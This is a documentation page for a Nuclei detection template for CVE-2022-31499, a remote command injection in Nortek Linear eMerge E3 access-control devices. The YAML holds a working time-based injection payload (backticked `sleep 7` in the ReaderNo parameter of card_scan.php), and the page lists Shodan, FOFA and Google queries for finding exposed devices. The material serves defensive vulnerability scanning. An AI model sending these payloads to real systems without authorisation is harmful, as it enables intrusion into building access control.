Skip to content
Nuclei Templates

Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection

ID: CVE-2022-31499

Severity: critical

Author: pikpikcu

Tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol

Description

Section titled “Description”

Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.

YAML Source

Section titled “YAML Source”
id: CVE-2022-31499


info:
  name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection
  author: pikpikcu
  severity: critical
  description: |
    Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
    - https://github.com/omarhashem123/CVE-2022-31499
    - http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31499
    - https://eg.linkedin.com/in/omar-1-hashem
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-31499
    cwe-id: CWE-78
    epss-score: 0.50608
    epss-percentile: 0.97247
    cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nortekcontrol
    product: emerge_e3_firmware
    shodan-query:
      - title:"eMerge"
      - http.title:"emerge"
      - http.title:"linear emerge"
    fofa-query:
      - title="emerge"
      - title="linear emerge"
    google-query:
      - intitle:"linear emerge"
      - intitle:"emerge"
  tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol


http:
  - raw:
      - |
        @timeout: 15s
        GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - duration>=7
          - contains(header, "text/html")
          - status_code == 200
          - contains(body, '{\"CardNo\":false')
        condition: and
# digest: 490a0046304402201ed33eba5dd6af3ebf694ad718d76fd7bc23418bc983f66b4d5979ec799c4e3f0220309df5ab5ec50ac587f38fd02ef99c6e42e1b3a618ee642bde6a6fdf786491ce:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-31499.yaml"

View on Github